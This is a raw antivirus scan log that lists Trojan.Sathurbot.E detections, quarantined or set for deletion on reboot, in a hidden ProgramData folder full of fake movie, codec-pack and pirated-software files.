Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4cfccf2b7ab56112367e4add655165ed, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4d26033c23c5eb763dc97044da803b3f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\52103c6d72a58fcc5177ba768e10d13a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\52a38425d712166eee12e8bf380ea984, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e2d766817600073df74c0cf6b0b61496, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e78ef53bd32609839d2737d2ecc0cf01, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e99153e73fac59432bc922fff075bc0f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e9f653c8aa546072140276f9706f7792, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\eb44cb5d0f487dc8aab2f8d517ff7536, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\ece31a64f1410072be86549af78ad112, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\5d8a4e35087c99336bdd7ac68d24e6d0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\5e1b9e8970a28f28e6a2991c1a12a3e2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\60e5bb6744a7342441c49a380d3eed3b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\63cbf76f3e3cf9d4a2df1e524d6b21ec, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\64a5e5ce5691ea61f806e4f0816da6a8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\65b917aee136d34b3beecc082ae85412, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\661b0595c94df273a12dd98fdc0668d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\667cf4fefa31563c464ffd08433c8d97, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6754cfecae61493964516786e862034a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\02b08cc11c5281e6d56d75c3e5ec6f6f\Microsoft Office 2013.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\02b08cc11c5281e6d56d75c3e5ec6f6f\Microsoft Office 2013.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\02b08cc11c5281e6d56d75c3e5ec6f6f\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\046134dc081d4e4bd60228d94b4a07ad\InSSIDer 2.1.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\046134dc081d4e4bd60228d94b4a07ad\InSSIDer 2.1.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06a0c344dcc4ebb5d62009a224e61685\Google SketchUp Pro 2016.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06a0c344dcc4ebb5d62009a224e61685\Google SketchUp Pro 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06a0c344dcc4ebb5d62009a224e61685\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06acf43cdbcc688223b6bd2ac8dda023\MorphVOX Pro Voice Changer 4.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06acf43cdbcc688223b6bd2ac8dda023\MorphVOX Pro Voice Changer 4.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a0c265a8fe0019c50ef44989aad9f4c\3D Chess Game.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a0c265a8fe0019c50ef44989aad9f4c\3D Chess Game.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a3b52a14ec94499246e603d7c967daf\A Dogs Purpose 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a3b52a14ec94499246e603d7c967daf\A Dogs Purpose 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a3b52a14ec94499246e603d7c967daf\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0be17d8f6bd1655f15541dd32c994fd8\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0be17d8f6bd1655f15541dd32c994fd8\Sony Vegas Pro 13.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0be17d8f6bd1655f15541dd32c994fd8\Sony Vegas Pro 13.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0c562f6570fa8511b5aff91dae1df22f\Mitchell OnDemand 5.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0c562f6570fa8511b5aff91dae1df22f\Mitchell OnDemand 5.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0c562f6570fa8511b5aff91dae1df22f\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0eeef81f31c54974191c3180e7c559b8\Marvels Doctor Strange 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0eeef81f31c54974191c3180e7c559b8\Marvels Doctor Strange 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0eeef81f31c54974191c3180e7c559b8\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0f9a9a82cbd1c7ca7783d2700bdbd06b\Boyka Undisputed IV 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0f9a9a82cbd1c7ca7783d2700bdbd06b\Boyka Undisputed IV 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0f9a9a82cbd1c7ca7783d2700bdbd06b\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\144aaba2a6a3a7024a71ade8f80dec76\The Lego Batman Movie 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\144aaba2a6a3a7024a71ade8f80dec76\The Lego Batman Movie 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\144aaba2a6a3a7024a71ade8f80dec76\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\14aafd8e07a9d2946637c94ef37d7480\Laal Rang 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\14aafd8e07a9d2946637c94ef37d7480\Laal Rang 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\14aafd8e07a9d2946637c94ef37d7480\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\169a3337025eed0ae46ef21ac9f029da\Silence 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\169a3337025eed0ae46ef21ac9f029da\Silence 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\169a3337025eed0ae46ef21ac9f029da\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\75fe5ecb00a0dcdcb2ebb33eeeafdb14\Jack Reacher Never Go Back 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\75fe5ecb00a0dcdcb2ebb33eeeafdb14\Jack Reacher Never Go Back 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\75fe5ecb00a0dcdcb2ebb33eeeafdb14\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\766ea216db4e132842f5f88dff5f4102\Once Upon a Time [SE05].txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\766ea216db4e132842f5f88dff5f4102\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\766ea216db4e132842f5f88dff5f4102\Video.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\76aab28808169629449f7b5b28dd1832\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\76aab28808169629449f7b5b28dd1832\Sweet Home 3D.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\76aab28808169629449f7b5b28dd1832\Sweet Home 3D.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\77711852ea1271f21e48fd93d6b460ed\John Wick Chapter Two 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\77711852ea1271f21e48fd93d6b460ed\John Wick Chapter Two 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\77711852ea1271f21e48fd93d6b460ed\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7845b238fba0d738febc6b8d75a76b19\TeraCopy Pro 3.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7845b238fba0d738febc6b8d75a76b19\TeraCopy Pro 3.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\785926353aace0cc149794b21ccc8c18\Sword Master 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\785926353aace0cc149794b21ccc8c18\Sword Master 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\785926353aace0cc149794b21ccc8c18\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\79c0273e316f7a0dc2dd98323942d7f1\Train To Busan 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\79c0273e316f7a0dc2dd98323942d7f1\Train To Busan 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\79c0273e316f7a0dc2dd98323942d7f1\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7bc7a84ed845669c6eed879826be7fbc\Rush Time Stand Still 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7bc7a84ed845669c6eed879826be7fbc\Rush Time Stand Still 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7bc7a84ed845669c6eed879826be7fbc\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7c416188c1a8b9f7a8ff4609a83e02b4\Get Out 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7c416188c1a8b9f7a8ff4609a83e02b4\Get Out 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7c416188c1a8b9f7a8ff4609a83e02b4\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7cde92506819f51e710688643e7873e9\Major Crimes [SE05].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7cde92506819f51e710688643e7873e9\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7cde92506819f51e710688643e7873e9\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dab3302070f8e886220313eae12694e\Greys Anatomy [SE12].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dab3302070f8e886220313eae12694e\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dab3302070f8e886220313eae12694e\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dc7aa964a3778773926ce47d3ed6bc7\Land of Mine 2015.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dc7aa964a3778773926ce47d3ed6bc7\Land of Mine 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dc7aa964a3778773926ce47d3ed6bc7\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d689be2c56c9bef8cd92cf62e665ba1a\Adobe Premiere Pro CC 2015.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d689be2c56c9bef8cd92cf62e665ba1a\Adobe Premiere Pro CC 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d689be2c56c9bef8cd92cf62e665ba1a\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d83514de16706316d5a5f1caef8d2b36\Pretty Little Liars [SE07].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d83514de16706316d5a5f1caef8d2b36\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d83514de16706316d5a5f1caef8d2b36\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d8f7b2e0e75b2750819e98aeabdb125d\The Bounce Back 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d8f7b2e0e75b2750819e98aeabdb125d\The Bounce Back 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d8f7b2e0e75b2750819e98aeabdb125d\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\daafc1ea4f1c3d7d6bcbbad50a4a8ea3\Suits [SE05].txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\daafc1ea4f1c3d7d6bcbbad50a4a8ea3\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\daafc1ea4f1c3d7d6bcbbad50a4a8ea3\Video.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\dd4971dcc1fffa4e94555637edd79abf\See You Tomorrow 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\dd4971dcc1fffa4e94555637edd79abf\See You Tomorrow 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\dd4971dcc1fffa4e94555637edd79abf\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ddbecfa53bce79286cf9a44b4d6c6c90\Trainspotting 1996.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ddbecfa53bce79286cf9a44b4d6c6c90\Trainspotting 1996.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ddbecfa53bce79286cf9a44b4d6c6c90\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de177bcd62fd5092202343daceab8714\La Leyenda del Chupacabras 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de177bcd62fd5092202343daceab8714\La Leyenda del Chupacabras 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de177bcd62fd5092202343daceab8714\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de957e4f995aaddbf21a460ac6d6bf6d\House of Cards [SE04].txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de957e4f995aaddbf21a460ac6d6bf6d\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de957e4f995aaddbf21a460ac6d6bf6d\Video.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\548509c4cb148f0dc069d61e4191e2d9\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\548509c4cb148f0dc069d61e4191e2d9\SPSS 20.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\548509c4cb148f0dc069d61e4191e2d9\SPSS 20.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\55608f6aefba4db7458a652a79a15c92\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\55608f6aefba4db7458a652a79a15c92\Siemens Solid Edge ST9.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\55608f6aefba4db7458a652a79a15c92\Siemens Solid Edge ST9.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\56b05055acf8caa94b019cad0d058ca3\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\56b05055acf8caa94b019cad0d058ca3\SONY Sound Forge Pro 10.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\56b05055acf8caa94b019cad0d058ca3\SONY Sound Forge Pro 10.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\573376c678cdf8388e8ca569e6a3f42b\Grass Valley EDIUS Pro 7.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\573376c678cdf8388e8ca569e6a3f42b\Grass Valley EDIUS Pro 7.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\573376c678cdf8388e8ca569e6a3f42b\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\577a157404a9c2bfa0ed3b91f432239c\Fantastic Beasts and Where to Find.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\577a157404a9c2bfa0ed3b91f432239c\Fantastic Beasts and Where to Find.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\577a157404a9c2bfa0ed3b91f432239c\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\580b8e805f78816a32ad46a2d30c4501\Autocad 2008.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\580b8e805f78816a32ad46a2d30c4501\Autocad 2008.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\580b8e805f78816a32ad46a2d30c4501\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5ad8fa78eabe15893d3376c8c500e258\Journey to the West Demon Chapter.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5ad8fa78eabe15893d3376c8c500e258\Journey to the West Demon Chapter.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5ad8fa78eabe15893d3376c8c500e258\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5afc95652210998bd40844db7075e204\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5afc95652210998bd40844db7075e204\Weiner 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5afc95652210998bd40844db7075e204\Weiner 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6dcba063d23763207581bb52dacb051\Arturia V Collection 5.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6dcba063d23763207581bb52dacb051\Arturia V Collection 5.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6dcba063d23763207581bb52dacb051\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6e8ba69ae6d2e1eaa905bca8e6d90ff\Kill Command 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6e8ba69ae6d2e1eaa905bca8e6d90ff\Kill Command 2016.txt, Quarantined, [2851], [355073],1.0.1064
